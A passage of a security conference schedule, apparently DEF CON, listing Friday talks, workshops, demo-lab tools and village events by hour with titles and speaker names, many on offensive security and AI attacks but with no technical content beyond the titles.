DCW - cont...(09:00-12:59 PDT) - Accelerating Malware Analysis with WinDbg Time Travel Debugging - Joshua "jstrosch" Stroschein,Jae Young Kim
DCW - cont...(09:00-12:59 PDT) - SnowGoat: Exposing Hidden Security Risks and Leaking Data Like a Threat Actor - Lior Adar,Chen Levy Ben Aroy
DCW - cont...(09:00-12:59 PDT) - Medical Device Hacking: 201 - Michael "v3ga" Aguilar,Alex "cheet" Delifer
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DL - Copycat - Identity Stealer Extension - Dakshitaa Babu,Shourya Pratap Singh
DL - DVBE - Damn Vulnerable Browser Extension - Abhinav Khanna
DL - Empire 6.0 - Vincent "Vinnybod" Rose,Jake "Hubble" Krasnov
DL - EntraGoat - A Deliberately Vulnerable Entra ID Environment - Tomer Nahum,Jonathan Elkabas
DL - FLARE-VM - Joshua "jstrosch" Stroschein,Elliot Chernofsky
IOTV - cont...(11:45-12:30 PDT) - Never enough about cameras - The firmware encryption keys hidden under the rug - Alexandru Lazar
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - Travis Goodspeed/No Starch Press - Travis Goodspeed
MISC - Book Signing - Firewalls Don't Stop Dragons: A Step-by-Step Guide to Computer Security and Privacy for Non-Techies (5th ed) - Carey Parker - Carey Parker
MWV - cont...(10:00-12:59 PDT) - Getting started in Malware Analysis with Ghidra - Wesley McGrew
MWV - KeePass, weaponized - Juho Jauhiainen
MWV - (12:40-13:10 PDT) - Grandoreiro & friends: brazilian banking trojans tour outside Latin America - Josep Albors
PAYV - Risk and payments across the ecosystem - Gary Kao
PGE - Friends of Bill W -
PLV - cont...(11:45-12:30 PDT) - Dark Capabilities: When Tech Companies Become Threat Actors - Tom Cross,Greg Conti
PSV - Flipping Locks - Remote Badge Cloning with the Flipper Zero and More - Langston Clements,Dan Goga
QTV - EduQ: A DIY Self-Education Platform for Hackers to Break, Build, and Experiment with Quantum-Secured Networks - Yann Allain
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
RTV - AIMaL: Artificially Intelligent Malware Launcher - Endrit Shaqiri,Natyra Shaqiri
RTV - GlytchC2: Command execution and data exfiltration of any kind through live streaming platforms - Anıl Çelik,Emre Odaman
RTV - Instant API Hacker! - Corey Ball
RTV - Vector Space Manipulation in LLMs - Muhammad Mudassar Yamin
RTV - Bridge to Nowhere Good: When Azure Relay becomes a Red Teamer's highway - Edward Landers,Josh Huff,Robert Pimentel
RTV - Don't be LLaMe - The basics of attacking LLMs in your Red Team exercises - Alex Bernier,Brent Harrell
RTV - Stealing Browser Cookies: Bypassing the newest Chrome security measures - Rafael Felix
RTV - OSINT for Hackers - Lee McWhorter,Sandra Stibbards
SEV - cont...(08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - Improv -

 

Friday - 13:00 PDT


Return to Index  -  Locations Legend
- (13:15-13:59 PDT) - Hard Hat Brigade Creations Q&A - MrBill,M0nkeyDrag0n,Hydrox,CoD_Segfault
BBV - (13:30-14:30 PDT) - Creator Panel Discussion - Ben "nahamsec" Sadeghipour,Justin "rhynorater" Gardner,Katie "InsiderPhD" Paxton-Fear
BHV - cont...(11:00-15:59 PDT) - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
BHV - (13:45-14:30 PDT) - Digital Casualties: Documenting Cyber-Induced Patient Harm in Modern Healthcare - Jorge Acevedo Canabal,Scott Shackleford,Joseph Davis
CON - Pub Quiz at DEF CON -
CON - cont...(12:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CPV - A Tale of Weeds and Roses: Propagating the Right Data Protection Agreements with Vendors - Irene Mo,Alyssa Coley
CRE - cont...(12:00-13:50 PDT) - Red Teaming Financial Defenses - Wei Hong,Chloe Chong
CRE - cont...(10:00-17:59 PDT) - WipeOut XL hi-score tournament -
CRE - cont...(10:00-17:59 PDT) - Career Fair: Interview Tips and Referral - Krity Kharbanda,Aastha Sahni
CRE - Rebuild The World: Access to secure software dependency management everywhere with Nix - Tom Berek,Farid Zakaria,Daniel Baker
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - cont...(12:30-13:15 PDT) - Ghosts in the Machine Check - Conjuring Hardware Failures for Cross-ring Privilege Escalation - Christopher "xoreaxeaxeax" Domas
DCT - (13:30-14:15 PDT) - Recording PCAPs from Stingrays With a $20 Hotspot - Cooper "CyberTiger" Quintin,oopsbagel
DCT - What is Dead May Never Die: The Ghost of Internet Explorer in Windows: MapUrlToZone - George Hughey,Rohit Mothe
DCT - Advanced Active Directory to Entra ID lateral movement techniques - Dirk-jan Mollema
DCT - cont...(12:30-13:15 PDT) - Cash, Drugs, and Guns: Why Your Safes Aren't Safe - Mark Omo,James Rowley
DCT - (13:30-14:15 PDT) - Dead Made Alive Again: Bypassing Intent Destination Checks and Reintroducing LaunchAnyWhere Privilege Escalation - Qidan "flanker_hqd" He
DCT - cont...(12:30-13:15 PDT) - Edge of Tomorrow: Foiling Large Supply Chain Attacks By Taking 5k Abandoned S3 Buckets from Malware and Benign Software - Maksim Shudrak
DCT - (13:30-14:15 PDT) - Weaponizing Trust: Investigating a Threat Actor Targeting Security Researchers and Academics - Christophe Tafani-Dereeper,Matt Muir
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DDV - Tracking 300k+ drives: What we’ve learned after 13 years - Pat Patterson,Stephanie Doyle
DL - Cryptosploit - Matt Cheung
DL - Have I Been Ransomed? - Juanma "M4C" Tejada
DL - Lex Sleuther - Aaron "KNOX" James
DL - Messenger - Proxies Here There and Everywhere - Skyler Knecht,Kevin Clark
DL - Unmanned Wireless Penetration Testing Device - Ayaan Qayyum,Omar Hamoudeh
HRV - Free Ham Radio Exams -
IOTV - What is Dead May Never Die: The Immortality of SDK Bugs - Richard "HeadlessZeke" Lawshae,Chiao-Lin "Steven Meow" Yu,Kai-Ching "Keniver" Wang
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - Nick Aleks/No Starch Press - Nick Aleks
MISC - Book Signing - Alex Matrosov/No Starch Press - Alex Matrosov
MWV - cont...(12:40-13:10 PDT) - Grandoreiro & friends: brazilian banking trojans tour outside Latin America - Josep Albors
MWV - (13:40-13:55 PDT) - Using Stardew Valley mods as a C2 and infostealer - Gecko
PHV - Teaching Your Reverse Proxy to Think: Fingerprint-Based Bot Blocking & Dynamic Deception - Adel Karimi
PLV - Takes All Kinds: Building Onramps for Emergency Web Archiving in Ukraine and Beyond - Quinn Dombrowski
PLV - (13:45-14:30 PDT) - Third-Party Access Granted: A Postmortem on Student Privacy and the Exploit That’s Still in Production - Sharlene Toney
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
RTV - cont...(12:00-13:50 PDT) - AIMaL: Artificially Intelligent Malware Launcher - Endrit Shaqiri,Natyra Shaqiri
RTV - cont...(12:00-13:50 PDT) - GlytchC2: Command execution and data exfiltration of any kind through live streaming platforms - Anıl Çelik,Emre Odaman
RTV - cont...(12:00-15:50 PDT) - Instant API Hacker! - Corey Ball
RTV - cont...(12:00-13:50 PDT) - Vector Space Manipulation in LLMs - Muhammad Mudassar Yamin
RTV - cont...(12:00-13:50 PDT) - Bridge to Nowhere Good: When Azure Relay becomes a Red Teamer's highway - Edward Landers,Josh Huff,Robert Pimentel
RTV - Weaponizing Kestrel: Red Team Tradecraft for Hunting - Daniel Benavides,Ronald González
RTV - Red Teaming Kubernetes: From App-Level CVEs to Full Cluster Takeover - Lenin Alevski
RTV - cont...(12:00-13:50 PDT) - OSINT for Hackers - Lee McWhorter,Sandra Stibbards
SEV - cont...(08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(12:00-13:30 PDT) - Improv -
SEV - (13:30-15:30 PDT) - SEC Vishing Competition (SECVC) -

 

Friday - 14:00 PDT


Return to Index  -  Locations Legend
BBV - Securing Intelligence: How hackers are breaking modern AI systems … and how bug bounty programs can keep up - Dane Sherrets,Shlomie Liberow
BBV - cont...(13:30-14:30 PDT) - Creator Panel Discussion - Ben "nahamsec" Sadeghipour,Justin "rhynorater" Gardner,Katie "InsiderPhD" Paxton-Fear
BBV - (14:30-15:30 PDT) - Testing Trust Relationships: Breaking Network Boundaries - Michael Gianarakis,Jordan Macey
BHV - cont...(11:00-15:59 PDT) - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
BHV - cont...(13:45-14:30 PDT) - Digital Casualties: Documenting Cyber-Induced Patient Harm in Modern Healthcare - Jorge Acevedo Canabal,Scott Shackleford,Joseph Davis
CHV - (14:30-14:59 PDT) - Modern Odometer Manipulation - collin,oblivion
CON - cont...(13:00-14:59 PDT) - Pub Quiz at DEF CON -
CON - cont...(12:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CPV - (14:30-14:59 PDT) - QRAMM: The Cryptographic Migration to a Post-Quantum World - Emily Fane,Abdel Sy Fane
CRE - Evolution and History of Drain and Approval Attacks - utvecklas,George
CRE - cont...(10:00-17:59 PDT) - WipeOut XL hi-score tournament -
CRE - cont...(10:00-17:59 PDT) - Career Fair: Interview Tips and Referral - Krity Kharbanda,Aastha Sahni
CRE - Off-Grid Datarunning in Oppresive Regimes: Sneakernet and Pirate Box - Robert "LambdaCalculus" Menes
CRE - (14:45-15:30 PDT) - Introduction of Loong Community & Financial Identity crime (deepfake) regulation of diferetn jurisdictions - Noel Wong,KC Wong
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - cont...(13:30-14:15 PDT) - Recording PCAPs from Stingrays With a $20 Hotspot - Cooper "CyberTiger" Quintin,oopsbagel
DCT - DisguiseDelimit: Exploiting Synology NAS with Delimiters and Novel Tricks - Ryan Emmons
DCT - You snooze you lose: RPC-Racer winning RPC endpoints against services - Ron Ben Yizhak
DCT - cont...(13:30-14:15 PDT) - Dead Made Alive Again: Bypassing Intent Destination Checks and Reintroducing LaunchAnyWhere Privilege Escalation - Qidan "flanker_hqd" He
DCT - (14:30-15:15 PDT) - Siri-ously Leaky: Exploring Overlooked Attack Surfaces Across Apple's Ecosystem - Richard "richeeta" Hyunho Im
DCT - cont...(13:30-14:15 PDT) - Weaponizing Trust: Investigating a Threat Actor Targeting Security Researchers and Academics - Christophe Tafani-Dereeper,Matt Muir
DCT - (14:30-15:15 PDT) - Firewalls Under Fire: China's 5+ year campaign to penetrate perimeter network defenses - Andrew "Spike" Brandt
DCW - Contextualizing alerts with relevant logs and events without queries or LLMs - Ezz Tahoun
DCW - 64-bit Intel Assembly Language Programming for Hackers - Wesley McGrew
DCW - PLC Playground: Hands-On Industrial Control Systems Attacks - Anthony "Coin" Rose,Daniel Koranek,Tyler Bertles,César Ramirez 
DCW - Hands-on Kubernetes Attack & Defense Masterclass - Madhu "madhuakula" Akula
DCW - Analyzing and Creating Windows Shellcode for Hackers - Bramwell Brizendine,Austin Norby,Logan Cannan
DCW - Obfuscation Reloaded: Modern Techniques for Evading Detection - Jake "Hubble" Krasnov,Vincent "Vinnybod" Rose,Gannon "Dorf" Gebauer,Rey "Privesc" Bango
DCW - Dive into Windows Library Loading - Yoann "OtterHacker" DEQUEKER
DCW - Fine Tune your personal LLM assistant to Secure coding - Or Sahar,Yariv Tal
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DL - Metasploit's Latest Attack Capability and Workflow Improvements - Spencer "ZeroSteiner" McIntyre,Jack Heysel
DL - MPIT - Matrix Prompt Injection Tool and ShinoLLMApps - Shota "Sh1n0g1" Shinogi,Sasuke "Element138" Kondo
DL - Nebula - 4 Years and Still Kicking *aaS - Bleon "Gl4ssesbo1" Proko
DL - nRootTag - Exploiting Find My and Transforming Computers Into Unauthorized Trackers - Junming "Chapoly1305" Chen,Qiang Zeng
DL - OAuthSeeker - Adam "UNC1739" Crosser
GHV - Game Hacking 101 - Julian "Julez" Dunning
HRV - cont...(13:00-15:59 PDT) - Free Ham Radio Exams -
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - Philip Dunsey/No Starch Press - Philip Dunsey
MISC - Book Signing - Alfie Champion/No Starch Press - Alfie Champion
MWV - The creation of the Malmongotchi badge - Austin Worline
MWV - Binary exploitation basics - Leigh Trinity
MWV - (14:30-14:59 PDT) - Compromising Threat Actor Communications - Ben "polygonben" Folland
PAYV - The challenges of Sub-dermal Payments - Amal Graafstra
PLV - cont...(13:45-14:30 PDT) - Third-Party Access Granted: A Postmortem on Student Privacy and the Exploit That’s Still in Production - Sharlene Toney
PSV - Hacking Hotel Locks; The Saflok Vulnerabilities Expanded - Noah Holland,Josh Stiebel
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
RTV - Initial Access Tactics on MacOS - Adwiteeya Agrawal,Jianqiang (Stark) Li
RTV - Stealing Browser Cookies: Bypassing the newest Chrome security measures - Rafael Felix
RTV - cont...(12:00-15:50 PDT) - Instant API Hacker! - Corey Ball
RTV - A Look into Using Native Godot Calls to Create Malware - Aaron Hogan
RTV - Hack the Clock: Automating CVE Exploit searches to save time, money, and not get bored. - Jordan Bonagura
RTV - Leveraging AI and MCP Servers for Automated External Attack Surface Testing - Shane Krause
RTV - ModuleOverride – Changing a Tyre Whilst Driving - Alessandro Grisa,Ibai Castells
RTV - Adversary Intel Lab: Build Your First Threat Emulation Plan - Fredrik Sandström
SEV - cont...(08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(13:30-15:30 PDT) - SEC Vishing Competition (SECVC) -

 

Friday - 15:00 PDT


Return to Index  -  Locations Legend
ADV - Adversaries at War: Tactics, technologies, and lessons from modern battlefields - Gregory Carpenter,Barb Hirz,Bret Fowler,John Andre Bjørkhaug,John Johnson,Michael Tassey
ADV - (15:45-16:30 PDT) - Adversarial mindset, thinking like an attacker is no longer optional - Abhijith "Abx" B R,Keenan Skelly
ASV - VDP in Aviation - How it shouldn't be done! - Matt Gaffney
BBV - cont...(14:30-15:30 PDT) - Testing Trust Relationships: Breaking Network Boundaries - Michael Gianarakis,Jordan Macey
BBV - (15:30-15:59 PDT) - The Year of the Bounty Desktop: Bugs from Binaries - Parsia "CryptoGangsta" Hakimian
BHV - cont...(11:00-15:59 PDT) - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
CON - cont...(12:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CRE - cont...(14:00-15:50 PDT) - Evolution and History of Drain and Approval Attacks - utvecklas,George
CRE - cont...(10:00-17:59 PDT) - WipeOut XL hi-score tournament -
CRE - (15:30-16:30 PDT) - EFF/Hackers.town RayHunter build clinic -
CRE - cont...(10:00-17:59 PDT) - Career Fair: Interview Tips and Referral - Krity Kharbanda,Aastha Sahni
CRE - cont...(14:45-15:30 PDT) - Introduction of Loong Community & Financial Identity crime (deepfake) regulation of diferetn jurisdictions - Noel Wong,KC Wong
CRE - (15:30-15:59 PDT) - Grind vs Gleam: Building Reddit's DDoS Resilience - Pratik Lotia,Spencer Koch
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - (15:30-16:15 PDT) - Mastering Apple's Endpoint Security for Advanced macOS Malware Detection - Patrick Wardle
DCT - Gateways to Chaos - How We Proved Modems Are a Ticking Time Bomb That Hackers Can Access Everywhere - Chiao-Lin "Steven Meow" Yu
DCT - From Spoofing to Tunneling: New Red Team's Networking Techniques for Initial Access and Evasion - Shu-Hao, Tung 123ojp
DCT - cont...(14:30-15:15 PDT) - Siri-ously Leaky: Exploring Overlooked Attack Surfaces Across Apple's Ecosystem - Richard "richeeta" Hyunho Im
DCT - (15:30-16:15 PDT) - Unmasking the Snitch Puck: the creepy IoT surveillance tech in the school bathroom - Reynaldo "buh0",nyx
DCT - cont...(14:30-15:15 PDT) - Firewalls Under Fire: China's 5+ year campaign to penetrate perimeter network defenses - Andrew "Spike" Brandt
DCT - (15:30-16:15 PDT) - So Long, and Thanks for All the Phish - Harrison Sand,Erlend Leiknes
DCW - cont...(14:00-17:59 PDT) - Contextualizing alerts with relevant logs and events without queries or LLMs - Ezz Tahoun
DCW - cont...(14:00-17:59 PDT) - 64-bit Intel Assembly Language Programming for Hackers - Wesley McGrew
DCW - cont...(14:00-17:59 PDT) - PLC Playground: Hands-On Industrial Control Systems Attacks - Anthony "Coin" Rose,Daniel Koranek,Tyler Bertles,César Ramirez 
DCW - cont...(14:00-17:59 PDT) - Hands-on Kubernetes Attack & Defense Masterclass - Madhu "madhuakula" Akula
DCW - cont...(14:00-17:59 PDT) - Analyzing and Creating Windows Shellcode for Hackers - Bramwell Brizendine,Austin Norby,Logan Cannan
DCW - cont...(14:00-17:59 PDT) - Obfuscation Reloaded: Modern Techniques for Evading Detection - Jake "Hubble" Krasnov,Vincent "Vinnybod" Rose,Gannon "Dorf" Gebauer,Rey "Privesc" Bango
DCW - cont...(14:00-17:59 PDT) - Dive into Windows Library Loading - Yoann "OtterHacker" DEQUEKER
DCW - cont...(14:00-17:59 PDT) - Fine Tune your personal LLM assistant to Secure coding - Or Sahar,Yariv Tal
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DDV - MFT2: More Fungible Threats - Mauro Eldritch,Nelson Colón
DL - WarHead - Vishal "Vish" Thakur,David "Votd_ctf" Wearing
DL - GlytchC2 - Command Execution and Data Exfiltration of Any Kind Through Live Streaming Platforms - Anil Celik,Emre Odaman
DL - Angry Magpie - DLP Bypass Simulator - Jeswin Mathai,Xian Xiang Chang
DL - Robin - The Archaeologist of the Dark Web - Apurv "ASG_Sc0rpi0n" Singh Gautam
DL - Beaconator C2 Framework - Mike "CroodSolutions" Manrod,Ezra "Shammahwoods" Woods
HRV - cont...(13:00-15:59 PDT) - Free Ham Radio Exams -
ICSV - (15:30-15:59 PDT) - Locked Down, Not Locked Out: How I Escaped Your Secure Operator Workstation - Aaron Boyd
IOTV - Contextualizing alerts & logs at scale without queries or LLMs (opensource) - Ezz Tahoun
MHV - Threat Dynamics on the Seas - RADM John Mauger,Michael Sulmeyer,Adam Segal
MHV - (15:45-16:30 PDT) - Fighting the Digital Blockade: A View from Taiwan - Deputy Minister Herming Chiueh,Jason Vogt
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - JP Ausmasson/No Starch Press - JP Ausmasson
MISC - Book Signing - Future of Hacking: The Rise of Cybercrime and the Fight to Keep Us Safe - Laura S. Scherling, EdD / Bloomsbury - Laura S. Scherling, EdD
MISC - Book Signing - Daniel Reilly/No Starch Press - Daniel Reilly
MISC - Book Signing - The Hacker Mindset: A 5-Step Methodology for Cracking the System and Achieving Your Dreams - Garrett Gee/Hacker Warehouse - Garrett Gee
MWV - cont...(14:00-17:59 PDT) - Binary exploitation basics - Leigh Trinity
MWV - North Korea's Fur Shop: Poaching for Otters, Beavers, Ferrets and Capybaras - Mauro Eldritch,José Gómez
MWV - (15:50-16:20 PDT) - Silent Sigma: Unraveling Iranian APT's 0-Day Warfare and Covert C2 - Christopher Dio Chavez
PAYV - Passkeys in payments - Dan Pelegro
PLV - What Europeans are doing right about cyber security - Muhammad Mudassar Yamin,Espen Torseth
PLV - (15:45-16:30 PDT) - Secure Code Is Critical Infrastructure: Hacking Policy for the Public Good - Tanya "SheHacksPurple" Janca
RTV - Cyber Wargames: Redteam Rumble -
RTV - cont...(14:00-15:50 PDT) - Initial Access Tactics on MacOS - Adwiteeya Agrawal,Jianqiang (Stark) Li
RTV - cont...(14:00-15:50 PDT) - Stealing Browser Cookies: Bypassing the newest Chrome security measures - Rafael Felix
RTV - cont...(12:00-15:50 PDT) - Instant API Hacker! - Corey Ball
RTV - cont...(14:00-15:50 PDT) - A Look into Using Native Godot Calls to Create Malware - Aaron Hogan
RTV - Hybrid Attack - Jonathan Coradi
RTV - From USB to C2 - Will McGraw
RTV - AI-Powered Web Applications: A New Era in Security – Live Technical Demo - Ilkin Javadov
RTV - EncryptedClientHelloWorld: TLSv1.3 ECH As A Covert C2 Channel - Jose Plascencia
SEV - cont...(08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(13:30-15:30 PDT) - SEC Vishing Competition (SECVC) -
SEV - (15:30-15:59 PDT) - Improv -

 

Friday - 16:00 PDT


Return to Index  -  Locations Legend
ADV - cont...(15:45-16:30 PDT) - Adversarial mindset, thinking like an attacker is no longer optional - Abhijith "Abx" B R,Keenan Skelly
ASV - (16:30-16:59 PDT) - Burning, trashing, spacecraft crashing: a collection of vulnerabilities that will end your space mission - Andrzej Olchawa,Milenko Starcik,Ayman Boulaich,Ricardo Fradique
BBV - To Pay or Not to Pay? The Battle Between Bug Bounty & Vulnerability Disclosure Programs - Aaron "scriptingxss" Guzman
BBV - (16:30-16:59 PDT) - Hacking the Edge: Real-World ESI Injection Exploits - Robert "nytr0gen" Vulpe
BHV - Bio-Cryptography is the Game-Genie in a post quantum dystopia - James Utley
CHV - Hacking a head unit with malicious PNG - Danilo Erazo
CHV - (16:30-16:59 PDT) - Context Aware Anomaly Detection in Automotive CAN Without Decoding - Ravi Rajput
CHV - (16:30-16:59 PDT) - Smart Bus Smart Hacking: From Free WiFi to Total Control - Chiao-Lin "Steven Meow" Yu,Kai-Ching "Keniver" Wang
CON - cont...(12:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CPV - (16:30-16:59 PDT) - The depths that marketers will plummet to - 4dw@r3
CRE - Applied Cryptocurrency Hardware - Param D Pithadia,Michael "MSvB" Schloh von Bennewitz
CRE - cont...(10:00-17:59 PDT) - WipeOut XL hi-score tournament -
CRE - cont...(15:30-16:30 PDT) - EFF/Hackers.town RayHunter build clinic -
CRE - cont...(10:00-17:59 PDT) - Career Fair: Interview Tips and Referral - Krity Kharbanda,Aastha Sahni
CRE - (16:30-16:59 PDT) - Quiet Confidence: An Introvert's Journey to Technical Public Speaking - Emma Fang
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - cont...(15:30-16:15 PDT) - Mastering Apple's Endpoint Security for Advanced macOS Malware Detection - Patrick Wardle
DCT - (16:30-17:15 PDT) - HTTP/1.1 Must Die! The Desync Endgame - James "albinowax" Kettle
DCT - The (Un)Rightful Heir: My dMSA Is Your New Domain Admin - Yuval Gordon
DCT - Infecting the Boot to Own the Kernel: Bootkits and Rootkits Development - Alejandro "TheMalwareGuardian" Vazquez,Maria "drkrysSrng" San Jose
DCT - cont...(15:30-16:15 PDT) - Unmasking the Snitch Puck: the creepy IoT surveillance tech in the school bathroom - Reynaldo "buh0",nyx
DCT - (16:30-17:15 PDT) - Escaping the Privacy Sandbox with Client-Side Deanonymization Attacks - Eugene "spaceraccoon" Lim
DCT - cont...(15:30-16:15 PDT) - So Long, and Thanks for All the Phish - Harrison Sand,Erlend Leiknes
DCT - (16:30-16:50 PDT) - Killing Killnet - Alex Holden
DCW - cont...(14:00-17:59 PDT) - Contextualizing alerts with relevant logs and events without queries or LLMs - Ezz Tahoun
DCW - cont...(14:00-17:59 PDT) - 64-bit Intel Assembly Language Programming for Hackers - Wesley McGrew
DCW - cont...(14:00-17:59 PDT) - PLC Playground: Hands-On Industrial Control Systems Attacks - Anthony "Coin" Rose,Daniel Koranek,Tyler Bertles,César Ramirez 
DCW - cont...(14:00-17:59 PDT) - Hands-on Kubernetes Attack & Defense Masterclass - Madhu "madhuakula" Akula
DCW - cont...(14:00-17:59 PDT) - Analyzing and Creating Windows Shellcode for Hackers - Bramwell Brizendine,Austin Norby,Logan Cannan
DCW - cont...(14:00-17:59 PDT) - Obfuscation Reloaded: Modern Techniques for Evading Detection - Jake "Hubble" Krasnov,Vincent "Vinnybod" Rose,Gannon "Dorf" Gebauer,Rey "Privesc" Bango
DCW - cont...(14:00-17:59 PDT) - Dive into Windows Library Loading - Yoann "OtterHacker" DEQUEKER
DCW - cont...(14:00-17:59 PDT) - Fine Tune your personal LLM assistant to Secure coding - Or Sahar,Yariv Tal
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DL - PAPRa - Sean Marquez,Melanie "Goldfishlaser" Allen
DL - PatchLeaks - Huseyn "Khatai" Gadashov
DL - promptmap2 - Utku Sen
DL - RETINA - Realtime Electronic Threat and Intrusion Neutralization Apparatus - Cesare "Red5heep" Pizzi
DL - Tengu Marauder v2 - Lexie "L3xic0n" Thach,Munir Muhammad
MHV - cont...(15:45-16:30 PDT) - Fighting the Digital Blockade: A View from Taiwan - Deputy Minister Herming Chiueh,Jason Vogt
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - Um, ACKtually... -
MISC - Book Signing - - Jim O'Gorman/No Starch Press -
MISC - Book Signing - Breaking IN: A Practical Guide To Starting a Career In Information Security Cybersecurity Essentials For Startups : A Practical Guide - Ayman Elsawah - Ayman Elsawah
MWV - cont...(14:00-17:59 PDT) - Binary exploitation basics - Leigh Trinity
MWV - cont...(15:50-16:20 PDT) - Silent Sigma: Unraveling Iranian APT's 0-Day Warfare and Covert C2 - Christopher Dio Chavez
MWV - (16:30-16:59 PDT) - ClickFix: The Malware Delivery Technique Enabling Ransomware Affiliates and State-Sponsored APT Operations - Arda Büyükkaya
PAYV - Network tokens - Sanjeev Sharma
PGE - Cybersecurity in Latin America: The Untold Stories of Resilience & Innovation - Giovanni Cruz Forero
PGE - Queercon Mixer -
PLV - cont...(15:45-16:30 PDT) - Secure Code Is Critical Infrastructure: Hacking Policy for the Public Good - Tanya "SheHacksPurple" Janca
PSV - (16:30-16:59 PDT) - Access Control Done Right the First Time - Tim Clevenger
QTV - Quantum Table Top Threat Modelling - Jaya Baloo
RTV - cont...(15:00-16:59 PDT) - Cyber Wargames: Redteam Rumble -
SEV - cont...(08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - SEC Vishing Competition (SECVC) -

 

Friday - 17:00 PDT


Return to Index  -  Locations Legend
ADV - Of Stochastic Parrots and Deterministic Predators: Decision-Making in Adversarial Automation - Bobby Kuzma,Michael Odell
ASV - Moonlight Defender - Purple Teaming in Space! - Ben Hawkins
ASV - Satellite Networks Under Siege: Cybersecurity Challenges of Targeted DDoS Attacks - Roee Idan
BBV - VRP @ Google -- a look inside a large self-hosted VRP - Sam "erbbysam" Erb
BBV - (17:30-17:59 PDT) - Exploiting the Off-chain ecosystem in Web 3 Bug Bounty - Bruno "BrunoModificato" Halltari
BHV - They deployed Health AI on us. We’re bringing the rights & red teams. - Andrea Downing
BHV - (17:30-17:59 PDT) - How AI + Hardware can Transforming Point-of-Care Workflows - PamirAI
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CRE - cont...(16:00-17:50 PDT) - Applied Cryptocurrency Hardware - Param D Pithadia,Michael "MSvB" Schloh von Bennewitz
CRE - cont...(10:00-17:59 PDT) - WipeOut XL hi-score tournament -
CRE - cont...(10:00-17:59 PDT) - Career Fair: Interview Tips and Referral - Krity Kharbanda,Aastha Sahni
CRE - Badgelife: Lessons from Years of Do’s, Don’ts, and Last-Minute Saves - Abhinav Pandagale,MakeItHackin
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - cont...(16:30-17:15 PDT) - HTTP/1.1 Must Die! The Desync Endgame - James "albinowax" Kettle
DCT - (17:30-17:50 PDT) - Rusty pearls: Postgres RCE on cloud databases - Tal "TLP" Peleg,Coby Abrams
DCT - Orion - fuzzing workflow automation - Max Bazalii,Marius Fleischer
DCT - Emulating Embedded Linux Devices at Scale with Light-Touch Firmware Rehosting - Sigusr Polke
DCT - cont...(16:30-17:15 PDT) - Escaping the Privacy Sandbox with Client-Side Deanonymization Attacks - Eugene "spaceraccoon" Lim
DCT - (17:30-17:50 PDT) - Silent Leaks: Harvesting Secrets from Shared Linux Environments - Cernica Ionut Cosmin
DCT - Building a Malware Museum - Mikko Hypponen
DCW - cont...(14:00-17:59 PDT) - Contextualizing alerts with relevant logs and events without queries or LLMs - Ezz Tahoun
DCW - cont...(14:00-17:59 PDT) - 64-bit Intel Assembly Language Programming for Hackers - Wesley McGrew
DCW - cont...(14:00-17:59 PDT) - PLC Playground: Hands-On Industrial Control Systems Attacks - Anthony "Coin" Rose,Daniel Koranek,Tyler Bertles,César Ramirez 
DCW - cont...(14:00-17:59 PDT) - Hands-on Kubernetes Attack & Defense Masterclass - Madhu "madhuakula" Akula
DCW - cont...(14:00-17:59 PDT) - Analyzing and Creating Windows Shellcode for Hackers - Bramwell Brizendine,Austin Norby,Logan Cannan
DCW - cont...(14:00-17:59 PDT) - Obfuscation Reloaded: Modern Techniques for Evading Detection - Jake "Hubble" Krasnov,Vincent "Vinnybod" Rose,Gannon "Dorf" Gebauer,Rey "Privesc" Bango
DCW - cont...(14:00-17:59 PDT) - Dive into Windows Library Loading - Yoann "OtterHacker" DEQUEKER
DCW - cont...(14:00-17:59 PDT) - Fine Tune your personal LLM assistant to Secure coding - Or Sahar,Yariv Tal
HHV - All your keyboards are belong to us! - Federico Lucifredi
ICSV - (17:30-17:59 PDT) - Crossing the Line: Advanced Techniques to Breach the OT DMZ - Christopher Nourrie
IOTV - (17:30-17:59 PDT) - Vibe School: Making dumb devices smart with AI - Katie "InsiderPhD" Paxton-Fear
MHV - (17:30-17:59 PDT) - Hacking the Nautical Rules of the Road: Turn Left for Global Pwnage - Amp,Data
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(16:00-17:59 PDT) - Um, ACKtually... -
